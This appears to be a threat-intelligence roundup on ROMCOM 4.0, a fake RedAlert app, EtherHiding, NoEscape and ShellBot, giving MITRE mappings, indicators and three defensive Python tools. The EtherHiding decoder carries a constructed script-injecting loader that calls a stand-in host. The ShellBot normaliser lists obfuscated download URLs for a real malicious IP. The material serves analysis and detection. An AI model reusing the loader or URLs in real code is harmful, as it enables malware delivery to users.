Anomali’s Cyber Watch roundup covers multiple campaigns including ROMCOM 4.0 (PEAPOD) backdoors targeting defense and government sectors, a typosquatted RedAlert Android infostealer, EtherHiding via blockchain hosting, the NoEscape ransomware, and ShellBot DDoS using hexadecimal IP notation. The piece outlines observed techniques, indicators, and defensive notes, directing readers to block or monitor related artifacts in their infrastructure. hashtags: #ROMCOM #PEAPOD #RedAlert #EladNava #EtherHiding #ClearFake #BinanceSmartChain #WordPress #NoEscape #ShellBot #HexadecimalIP
Keypoints
- ROMCOM 4.0 (PEAPOD) is a slimmed-down version of the ROMCOM backdoor whose modular components are downloaded on demand rather than shipped in one package; it has been used against conference attendees and government targets in Europe, and the article gives extensive MITRE mappings for it.
- A typosquatted Android app impersonating RedAlert, the legitimate rocket-alert app by Elad Nava, is built to collect sensitive device data and exfiltrate it over encrypted channels.
- EtherHiding (seen in the ClearFake campaign) stores its second-stage payload in a Binance Smart Chain smart contract; code injected into compromised WordPress sites retrieves it from the chain, which makes the payload cheap to rotate and hard to take down, and the final stage drops infostealers such as Amadey, Lumma, or RedLine.
- NoEscape ransomware operates as a RaaS with double extortion supplemented by DDoS and flexible geographic targeting; the article cites extensive MITRE mappings across initial access, persistence, and defense evasion.
- ShellBot DDoS malware fetches its payload from a URL whose host is written as a single hexadecimal integer (0x2763da4e) instead of a dotted-quad address, an obfuscation aimed at string-based URL detection; the bot itself takes commands over IRC.
- Across campaigns, indicators (domains, files, and artifacts) are available in Anomali for blocking and monitoring, underscoring the value of threat intelligence platforms.
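The EtherHiding point above is that the payload lives in a contract's return value, so a defender who can see the eth_call traffic can decode what the contract serves without running it. The block below is an added example, not campaign code or Anomali tooling: it ABI-decodes the single `string` a contract call returns and flags it if it looks like JavaScript. The contract return value is constructed here, and the base64 wrapping of the loader is an assumption about the loader's format.

```python
"""
Decode the ABI-encoded string an EtherHiding-style contract call returns and
inspect it instead of executing it. Added example, not campaign code: the
contract return value below is constructed, and the base64 wrapping of the
payload is an assumption about the loader's format.
"""
import base64
import binascii
import re

WORD = 32  # every ABI head/tail slot is one 32-byte word


def abi_encode_string(s: str) -> bytes:
    """Encode a single dynamic `string` return value (used only to build the sample)."""
    data = s.encode()
    padded = data + b"\x00" * (-len(data) % WORD)
    return WORD.to_bytes(WORD, "big") + len(data).to_bytes(WORD, "big") + padded


def abi_decode_string(ret: bytes) -> str:
    """Decode a single dynamic `string` return value: offset word, length word, data."""
    if len(ret) < 2 * WORD:
        raise ValueError("return data too short for a dynamic string")
    offset = int.from_bytes(ret[:WORD], "big")
    if offset + WORD > len(ret):
        raise ValueError("offset points past the return data")
    length = int.from_bytes(ret[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(ret):
        raise ValueError("declared length exceeds the return data")
    return ret[start:start + length].decode("utf-8", errors="replace")


# Crude but useful: a string a contract returns should be data, not JavaScript.
CODE_MARKERS = re.compile(
    r"""\b(eval|Function|document\.write|atob|fromCharCode|createElement\s*\(\s*['"]script)""",
    re.I,
)


def inspect_eth_call_result(hex_result: str) -> dict:
    """Decode an eth_call result (0x-prefixed hex) and report whether it hides code."""
    raw = bytes.fromhex(hex_result[2:] if hex_result.lower().startswith("0x") else hex_result)
    text = abi_decode_string(raw)
    payload = text
    try:  # unwrap one layer of base64 if the string is valid base64 (assumed loader format)
        payload = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        pass
    return {
        "encoded_len": len(text),
        "payload": payload,
        "looks_like_code": bool(CODE_MARKERS.search(payload)),
    }


# Constructed sample: a script-injecting loader of the kind the campaign served,
# base64-wrapped and ABI-encoded the way a contract would return it.
SAMPLE_LOADER = ("var s=document.createElement('script');"
                 "s.src='https://example.invalid/stage2.js';document.head.appendChild(s);")
SAMPLE_ETH_CALL_RESULT = "0x" + abi_encode_string(
    base64.b64encode(SAMPLE_LOADER.encode()).decode()
).hex()

if __name__ == "__main__":
    print(inspect_eth_call_result(SAMPLE_ETH_CALL_RESULT))
```

The decoder is the same one a web3 library performs before the injected script evaluates the result; doing it in a sandbox gives you the stage-two URL and domains to block without touching the site. Contract calls are read-only and free, so the operators can swap the payload at any time; re-check the contract rather than caching the decoded script as the indicator.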
MITRE Techniques
- [T1105] Ingress Tool Transfer (formerly Remote File Copy) – ROMCOM 4.0 downloads its components on demand.
- [T1027] Obfuscated Files or Information – ROMCOM 4.0 ships obfuscated payloads and loaders.
- [T1140] Deobfuscate/Decode Files or Information – ROMCOM 4.0 decodes its payloads at runtime.
- [T1546.015] Event Triggered Execution: Component Object Model Hijacking – ROMCOM 4.0 persistence.
- [T1082] System Information Discovery – ROMCOM/PEAPOD host reconnaissance.
- [T1005] Data from Local System – ROMCOM/PEAPOD collects data from the compromised host.
- [T1070.004] Indicator Removal: File Deletion – ROMCOM/PEAPOD deletes staged files.
- [T1070.009] Indicator Removal: Clear Persistence – ROMCOM/PEAPOD removes its own persistence.
- [T1633] Virtualization/Sandbox Evasion (Mobile ATT&CK IDs follow for the RedAlert impersonator) – the app checks whether it is running in an emulator or sandbox.
- [T1633.001] Virtualization/Sandbox Evasion: System Checks – the RedAlert impersonator queries system properties to detect analysis environments.
- [T1424] Process Discovery – the RedAlert impersonator enumerates running processes.
- [T1426] System Information Discovery – the RedAlert impersonator collects device information.
- [T1533] Data from Local System – the RedAlert impersonator collects data stored on the device.
- [T1521.002] Encrypted Channel: Asymmetric Cryptography – the RedAlert impersonator uses RSA to protect the data it sends out.
- [T1437.001] Application Layer Protocol: Web Protocols – the RedAlert impersonator talks to its C2 over HTTP(S).
- [T1646] Exfiltration Over C2 Channel – the RedAlert impersonator exfiltrates over the same channel.
- [T1078] Valid Accounts – EtherHiding operators rely on legitimate credentials where they have them.
- [T1190] Exploit Public-Facing Application – EtherHiding gains its foothold through vulnerable WordPress sites.
- [T1105] Ingress Tool Transfer – EtherHiding pulls its second-stage payload from the blockchain.
- [T1027] Obfuscated Files or Information – EtherHiding obfuscates the injected script and payload.
- [T1140] Deobfuscate/Decode Files or Information – the EtherHiding loader decodes the payload before executing it.
- [T1555] Credentials from Password Stores – the delivered infostealers harvest stored credentials.
- [T1133] External Remote Services – NoEscape initial access through exposed remote services.
- [T1078] Valid Accounts – NoEscape uses valid accounts for access and persistence.
- [T1204] User Execution – NoEscape infection vectors that rely on the user running the payload.
- [T1053.005] Scheduled Task/Job: Scheduled Task – NoEscape uses scheduled tasks (a living-off-the-land persistence mechanism).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – NoEscape persistence.
- [T1562.001] Impair Defenses: Disable or Modify Tools – NoEscape disables or tampers with security tools.
- [T1027] Obfuscated Files or Information – NoEscape obfuscation.
- [T1055] Process Injection – NoEscape injects into other processes.
- [T1070.004] Indicator Removal: File Deletion – NoEscape deletes traces of itself.
- [T1112] Modify Registry – NoEscape modifies the registry.
- [T1140] Deobfuscate/Decode Files or Information – NoEscape decodes its payloads at runtime.
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – NoEscape checks for virtualized or analysis environments.
- [T1003] OS Credential Dumping – NoEscape credential access.
- [T1482] Domain Trust Discovery – NoEscape enumerates domain trusts.
- [T1069] Permission Groups Discovery – NoEscape enumerates groups.
- [T1021.001] Remote Services: Remote Desktop Protocol – NoEscape lateral movement over RDP.
- [T1560.001] Archive Collected Data: Archive via Utility – NoEscape archives data before exfiltration.
- [T1071.001] Application Layer Protocol: Web Protocols – NoEscape C2 over web protocols.
- [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – NoEscape exfiltrates to cloud storage.
- [T1498] Network Denial of Service – ShellBot DDoS activity.
- [T1027] Obfuscated Files or Information – ShellBot hides its download host as a hexadecimal integer.
- [T1078.001] Valid Accounts: Default Accounts – ShellBot is installed on hosts reachable with default credentials.
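The ROMCOM mappings to T1027 and T1140 above come down to one concrete artifact in the IOC list: an XOR-encrypted DLL fetched by the first-stage EXE. The block below is an added example for an analyst who has captured that DLL and not the loader, not ROMCOM tooling or anything from the Trend Micro or Anomali write-ups. It recovers a repeating XOR key from the zero-filled reserved fields of the PE DOS header, which are known plaintext in any compiler-produced image. The sample image and the 7-byte key are constructed, and the key is assumed to be no longer than the 20-byte e_res2 field.

```python
"""
Recover a repeating XOR key from an encrypted PE using the zero-filled reserved
fields of the DOS header as known plaintext. Added example, not ROMCOM tooling:
the sample image and key below are constructed, and the key length is assumed
to be at most 20 bytes (the size of e_res2).
"""
from itertools import cycle
from typing import Optional

E_RES = range(0x1C, 0x24)    # IMAGE_DOS_HEADER.e_res: 8 reserved bytes, always zero
E_RES2 = range(0x28, 0x3C)   # IMAGE_DOS_HEADER.e_res2: 20 reserved bytes, always zero
MAX_KEY_LEN = len(E_RES2)    # 20 consecutive zero bytes cover every slot of a key this long


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the key is aligned to offset 0 of the blob."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_xor_key(blob: bytes) -> Optional[bytes]:
    """Return the shortest repeating key consistent with a PE DOS header, or None."""
    if len(blob) < 0x40:
        return None
    for klen in range(1, MAX_KEY_LEN + 1):
        key = [None] * klen
        consistent = True
        # A ciphertext byte over a zero plaintext byte *is* the key byte for that slot.
        for pos in E_RES2:
            slot = pos % klen
            if key[slot] is None:
                key[slot] = blob[pos]
            elif key[slot] != blob[pos]:
                consistent = False
                break
        if not consistent or None in key:
            continue
        candidate = bytes(key)
        # Cross-check against plaintext that was not used to derive the key.
        head = xor_bytes(blob[:0x40], candidate)
        if head[:2] == b"MZ" and all(head[p] == 0 for p in E_RES):
            return candidate
    return None


def build_sample_image() -> bytes:
    """Constructed stand-in for a DLL: DOS header, DOS stub, a fake PE signature, filler."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[2:0x1C] = bytes(range(0x90, 0x90 + 0x1A))   # arbitrary non-zero header fields
    hdr[0x24:0x28] = b"\x01\x02\x03\x04"             # e_oemid / e_oeminfo
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")    # e_lfanew -> PE header at 0x80
    stub = b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21This program cannot be run in DOS mode.\r\n$"
    return bytes(hdr) + stub.ljust(0x40, b"\x00") + b"PE\x00\x00" + b"\xcc" * 64


SAMPLE_KEY = bytes.fromhex("a1f03c5e9d127b")  # 7-byte key, an assumption for the demo
ENCRYPTED_SAMPLE = xor_bytes(build_sample_image(), SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_xor_key(ENCRYPTED_SAMPLE)
    print("recovered key:", key.hex() if key else None)
    if key:
        print(xor_bytes(ENCRYPTED_SAMPLE, key)[:0x80])
```

The shortest consistent period is chosen because any multiple of the real key length also passes. If the sample fails both checks for every length up to 20, the key is longer, the header was stripped before encryption, or the scheme is not plain repeating XOR; the DOS stub text at offset 0x40 onwards is the next crib to try, and the "PE\0\0" signature at e_lfanew confirms a recovered key.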
Indicators of Compromise
- [IOC Type] IP Address – 39.99.218.78 (the dotted-quad form of the hexadecimal host 0x2763da4e in the ShellBot download URL)
- [IOC Type] File Name – malicious.exe, encrypted.dll, icon.ico – the ROMCOM 4.0 chain starts with an EXE downloader that fetches an XOR-encrypted DLL and a small icon file
- [IOC Type] File Type – EXE, DLL, ICO – observed in ROMCOM/PEAPOD and related components
- [IOC Type] Domain/URL – typosquatted domains referenced in the campaigns (not explicitly named in the article)
- [IOC Type] Crypto/Algorithm – AES in CBC mode with PKCS5 padding combined with RSA, used by the RedAlert impersonator to protect collected data in transit (a behavioral fingerprint for analysts rather than a blockable artifact)
- [IOC Type] Platform – Binance Smart Chain (payload hosting) and WordPress (initial compromise) in EtherHiding; platforms to monitor rather than artifacts to block
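The ShellBot indicator is only useful if your URL matching can see through the hexadecimal host: a blocklist entry for 39.99.218.78 never matches the string "0x2763da4e". The block below is an added example, not from the Anomali or ASEC write-ups, that normalizes every host form `inet_aton()` accepts (a single hex, octal or decimal integer, and the two- and three-part mixed forms) back to a dotted quad and rewrites the URL. The host 0x2763da4e is the one quoted in the IOC list; every other URL and host in the block is constructed.

```python
"""
Normalize the non-dotted IPv4 host forms that ShellBot-style download URLs use
(0x2763da4e and friends) back to a dotted quad so they match blocklists. Added
example; the hosts and URLs are constructed apart from 0x2763da4e from the IOC list.
"""
from typing import Optional, Tuple
from urllib.parse import urlsplit, urlunsplit


def _parse_part(part: str) -> Optional[int]:
    """Parse one label the way inet_aton() does: 0x.. hex, 0.. octal, otherwise decimal."""
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16)
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def normalize_ipv4_host(host: str) -> Optional[str]:
    """Return the dotted-quad form of any inet_aton()-style host, or None if it is not one.
    a        -> one 32-bit value
    a.b      -> a is the first byte, b fills the remaining 24 bits
    a.b.c    -> a, b are the first two bytes, c fills the remaining 16 bits
    a.b.c.d  -> four bytes
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None or v < 0 for v in values):
        return None
    *lead, last = values
    if any(v > 0xFF for v in lead):
        return None
    last_bits = 8 * (4 - len(lead))
    if last >= 1 << last_bits:
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << last_bits) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonicalize_url(url: str) -> Tuple[str, bool]:
    """Rewrite the URL host to dotted-quad form; the flag says whether it was obfuscated."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    canon = normalize_ipv4_host(host)
    if canon is None or canon == host:
        return url, False
    netloc = canon + (f":{parts.port}" if parts.port else "")
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment)), True


if __name__ == "__main__":
    # Constructed URLs, all pointing at the same host as the IOC-list entry.
    for u in ("http://0x2763da4e/bot.pl", "http://660855374/bot.pl",
              "http://0x27.0x63.0xda.0x4e:8080/bot.pl", "http://047.0143.0332.0116/bot.pl",
              "http://39.6543950/bot.pl", "https://example.com/index.html"):
        print(u, "->", canonicalize_url(u))
```

Run the normalizer on proxy, DNS and EDR URL fields before comparison, not on the blocklist, since the attacker controls the spelling. Note that Python's `ipaddress` module rejects all of these forms, so validating a host with it and then falling back to a string match is exactly how the indicator gets missed; curl, wget and most libc resolvers accept them.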